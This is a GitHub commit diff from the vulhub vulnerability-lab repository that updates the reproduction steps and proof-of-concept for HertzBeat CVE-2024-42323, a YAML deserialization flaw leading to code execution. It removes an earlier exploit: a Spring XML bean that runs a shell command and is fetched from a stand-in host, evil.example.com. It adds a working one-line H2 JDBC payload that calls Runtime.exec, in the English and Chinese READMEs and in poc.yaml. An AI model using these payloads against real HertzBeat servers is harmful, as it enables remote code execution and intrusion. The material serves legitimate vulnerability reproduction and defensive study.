Merge pull request vulhub#626 from vulhub/hertzbeat-poc-improve

Update HertzBeat CVE-2024-42323 PoC and documentation
MeowwBox · Mar 9, 2025 · a49db72 · a49db72
2 parents 892da38 + e672bae
commit a49db72
Show file tree

Hide file tree

Showing 4 changed files with 8 additions and 41 deletions.
diff --git a/hertzbeat/CVE-2024-42323/2.png b/hertzbeat/CVE-2024-42323/2.png
diff --git a/hertzbeat/CVE-2024-42323/README.md b/hertzbeat/CVE-2024-42323/README.md
@@ -27,34 +27,17 @@ After the service is started, you can access the HertzBeat dashboard at `http://
 
 ## Vulnerability Reproduction
 
-First, you need to serve a malicious XML file, for example, `http://evil.example.com/spring.xml`:
-
-```xml
-<?xml version="1.0" encoding="UTF-8"?>
-<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
-  <bean id="commandRunner" class="java.lang.ProcessBuilder" init-method="start">
-    <constructor-arg>
-      <list>
-        <value>sh</value>
-        <value>-c</value>
-        <value><![CDATA[touch /tmp/success]]></value>
-      </list>
-    </constructor-arg>
-  </bean>
-</beans>
-```
-
-Then, make a malicious YAML file that contains the following content, which attempts to initialize the Spring context with your malicious XML file when deserialized:
+First prepare a malicious YAML file that filename ends with `.yaml`:
 
 ```yaml
-!!org.springframework.context.support.ClassPathXmlApplicationContext ["http://evil.example.com/spring.xml"]
+!!org.h2.jdbc.JdbcConnection [ "jdbc:h2:mem:test;MODE=MSSQLServer;INIT=drop alias if exists exec\\;CREATE ALIAS EXEC AS $$void exec() throws java.io.IOException { Runtime.getRuntime().exec(\"touch /tmp/success\")\\; }$$\\;CALL EXEC ()\\;", [], "a", "b", false ]
 ```
 
-Log into the HertzBeat dashboard, navigate to any monitor page and locate the import button. The interface allows users to import monitor configurations through YAML files (the filename must end with `.yaml`):
+Then log into the HertzBeat dashboard, navigate to any monitor page and locate the import button. The interface allows users to import monitor configurations through YAML files, upload the malicious YAML file:
 
 ![Locate the import button](1.png)
 
-When the malicious YAML file is imported through the web interface, HertzBeat will attempt to deserialize its contents, triggering the remote command execution:
+When the malicious YAML file is imported through the web interface, HertzBeat will attempt to deserialize its contents, triggering the remote code execution:
 
 ![Import the malicious YAML file](2.png)
 

diff --git a/hertzbeat/CVE-2024-42323/README.zh-cn.md b/hertzbeat/CVE-2024-42323/README.zh-cn.md
@@ -25,34 +25,17 @@ docker compose up -d
 
 ## 漏洞复现
 
-首先，你需要准备一个恶意 XML 文件并放在任意 Web 服务器上，例如 `http://evil.example.com/spring.xml`，其内容如下：
-
-```xml
-<?xml version="1.0" encoding="UTF-8"?>
-<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
-  <bean id="commandRunner" class="java.lang.ProcessBuilder" init-method="start">
-    <constructor-arg>
-      <list>
-        <value>sh</value>
-        <value>-c</value>
-        <value><![CDATA[touch /tmp/success]]></value>
-      </list>
-    </constructor-arg>
-  </bean>
-</beans>
-```
-
-然后构造一个包含以下内容的恶意 YAML 文件，这段 YAML 反序列化时会加载恶意 XML 文件：
+首先，准备一个恶意 YAML 文件，文件名必须以 `.yaml` 结尾，内容如下：
 
 ```yaml
-!!org.springframework.context.support.ClassPathXmlApplicationContext ["http://evil.example.com/spring.xml"]
+!!org.h2.jdbc.JdbcConnection [ "jdbc:h2:mem:test;MODE=MSSQLServer;INIT=drop alias if exists exec\\;CREATE ALIAS EXEC AS $$void exec() throws java.io.IOException { Runtime.getRuntime().exec(\"touch /tmp/success\")\\; }$$\\;CALL EXEC ()\\;", [], "a", "b", false ]
 ```
 
 然后登录 HertzBeat 后台，导航到任意监控页面并找到导入按钮，在这里将上面的恶意 YAML 文件导入：
 
 ![定位导入按钮](1.png)
 
-HertzBeat 对 YAML 文件进行反序列化时，触发远程命令执行：
+HertzBeat 对 YAML 文件进行反序列化时，触发远程代码执行：
 
 ![导入恶意 YAML 文件](2.png)
 

diff --git a/hertzbeat/CVE-2024-42323/poc.yaml b/hertzbeat/CVE-2024-42323/poc.yaml
@@ -0,0 +1 @@
+!!org.h2.jdbc.JdbcConnection [ "jdbc:h2:mem:test;MODE=MSSQLServer;INIT=drop alias if exists exec\\;CREATE ALIAS EXEC AS $$void exec() throws java.io.IOException { Runtime.getRuntime().exec(\"touch /tmp/success\")\\; }$$\\;CALL EXEC ()\\;", [], "a", "b", false ]
Original file line number	Diff line number	Diff line change
		@@ -0,0 +1 @@
		!!org.h2.jdbc.JdbcConnection [ "jdbc:h2:mem:test;MODE=MSSQLServer;INIT=drop alias if exists exec\\;CREATE ALIAS EXEC AS $$void exec() throws java.io.IOException { Runtime.getRuntime().exec(\"touch /tmp/success\")\\; }$$\\;CALL EXEC ()\\;", [], "a", "b", false ]